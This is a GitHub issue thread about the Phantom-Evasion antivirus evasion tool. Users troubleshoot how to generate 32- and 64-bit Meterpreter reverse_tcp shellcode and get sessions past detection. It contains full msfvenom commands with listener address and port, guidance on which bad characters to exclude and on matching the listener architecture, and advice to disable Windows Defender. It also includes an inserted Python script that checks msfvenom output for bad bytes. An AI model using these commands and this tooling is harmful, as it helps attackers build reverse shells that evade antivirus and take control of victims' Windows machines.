oddcod3 / Phantom-Evasion

Python antivirus evasion tool
GNU General Public License v3.0

Shellcode #17

Closed anonymouz4 closed 5 years ago

anonymouz4 commented 6 years ago

This is a fresh new summary of this old issue.

A lot of people had issues with creating custom shellcode and using it.

What is the goal: Create a 64-bit shellcode (reverse_tcp) and use it with Phantom-Evasion.

Previous tries:

Question: Can anyone who got this working post a detailed list of steps he did to achieve this? Something like:

Maybe @oddcod3 already tested this!

usama7628674 commented 6 years ago

@anonymouz4 I will retest 32-bit shellcode from Veil and share the results tomorrow. Maybe it's not working just for you.

anonymouz4 commented 6 years ago

@usama7628674 I took the time to write this question as well as possible, so please also read it carefully. The question is how to create 64-bit shellcode, which is not possible with Veil.

usama7628674 commented 6 years ago

@anonymouz4 Veil 32-bit shellcode is working fine. I got the session back to Meterpreter. I just generated the shellcode, used the x86 arch while compiling, then ran it on my Windows 10 v1803, and I can confirm I got the session.

Msfvenom 32-bit shellcode is also working fine, and yes, it wasn't dying for me. Make sure Windows Defender is turned off. The command I used while generating 32-bit shellcode: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d" > /root/Desktop/output

Msfvenom 64-bit shellcode is also working fine for me. The command that I used while generating 64-bit shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f c -b "/x00/x0a/x0d/xf0" > /root/Desktop/outputs

All the tests are done with the Windows shellcode injection multipath heapalloc option, no. (4), and for the encoder also option (4).

All three options are working for me, but sadly all are detected by Windows Defender. I have to disable it while testing.

Make sure you set up a 32-bit listener if you're using 32-bit shellcode and a 64-bit listener if you're using 64-bit shellcode, cuz I made a mistake: I set up a 32-bit listener while I had generated 64-bit shellcode, and the session did open but instantly closed.

Metasploit version that I used: 4.16.59-dev
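The two posts above and the follow-up below hinge on "bad characters" in the generated buffer: a 0x00 byte ends a C string early and 0x0a/0x0d are mangled by line-oriented transports, which is why msfvenom's `-b` option (which takes backslash escapes such as `\x00\x0a\x0d`) exists and why the poster added `\xf0` for the 64-bit payload. The added example below is not part of this issue thread or of Phantom-Evasion; it is a small checker that parses msfvenom's `-f c` style output (`"\x41\x42..."`) and reports which bad bytes, if any, survive and at what offsets. The sample buffers are constructed placeholder bytes, not real payloads, and the default bad-byte set is taken from the commands quoted above.

```python
import re
from typing import Dict, List

# Bytes treated as "bad" in the thread: NUL (terminates C strings),
# LF and CR (mangled by line-oriented transports). Assumed default for
# this example; the 64-bit post above additionally excluded 0xf0.
DEFAULT_BADCHARS = bytes([0x00, 0x0a, 0x0d])

# msfvenom -f c emits the buffer as C string literals of \xHH escapes.
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_c_buffer(text: str) -> bytes:
    """Extract the raw bytes from '-f c' style output, ignoring the
    surrounding 'unsigned char buf[] =' declaration and line breaks."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))


def find_badchars(buf: bytes, badchars: bytes = DEFAULT_BADCHARS) -> Dict[int, List[int]]:
    """Return {bad_byte: [offsets]} for every bad byte present in buf.
    An empty dict means the buffer is clean with respect to badchars."""
    hits: Dict[int, List[int]] = {}
    for offset, b in enumerate(buf):
        if b in badchars:
            hits.setdefault(b, []).append(offset)
    return hits


def report(text: str, badchars: bytes = DEFAULT_BADCHARS) -> str:
    """Human-readable summary: byte count plus any bad-byte offsets."""
    buf = parse_c_buffer(text)
    hits = find_badchars(buf, badchars)
    lines = [f"{len(buf)} bytes parsed"]
    if not hits:
        lines.append("no bad characters found")
    for b, offsets in sorted(hits.items()):
        lines.append(f"bad byte 0x{b:02x} at offsets {offsets}")
    return "\n".join(lines)


# Constructed sample outputs in the '-f c' layout (placeholder bytes,
# not real payloads). The second one deliberately contains 0x00 and 0x0d.
SAMPLE_CLEAN = 'unsigned char buf[] = \n"\\x90\\x90\\x41\\x42"\n"\\xc3";'
SAMPLE_DIRTY = 'unsigned char buf[] = \n"\\x90\\x00\\x41\\x0d"\n"\\xc3";'

if __name__ == "__main__":
    print("clean sample:\n" + report(SAMPLE_CLEAN))
    print("dirty sample:\n" + report(SAMPLE_DIRTY))
    # 64-bit variant from the thread: also exclude 0xf0
    print("dirty sample, x64 set:\n" + report(SAMPLE_DIRTY, DEFAULT_BADCHARS + b"\xf0"))
```

Run it against a saved `-f c` output file by passing the file's text to `report()`; a non-empty result from `find_badchars()` is the condition the thread is describing, where the encoder run did not remove every listed byte and a session either never starts or dies immediately.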

anonymouz4 commented 6 years ago

@usama7628674 First, thanks for taking the time! Why did you also use "/xf0" as a badchar, or where did you get this info from? Just curious. And which OS are you using as the listener? I'm listening with msfconsole on macOS. Maybe the metasploit-framework doesn't work 100% on Mac.

usama7628674 commented 6 years ago

@anonymouz4

> Why did you also use "/xf0" as a badchar, or where did you get this info from?

I did use it in the 64-bit shellcode cuz if I don't use it, the output shellcode has the bad characters \x00\x0d; that's why I use it. After using it, all the bad chars were gone from the shellcode.

> And which OS are you using as the listener?

Kali Linux 2018.2, Metasploit version 4.16.59-dev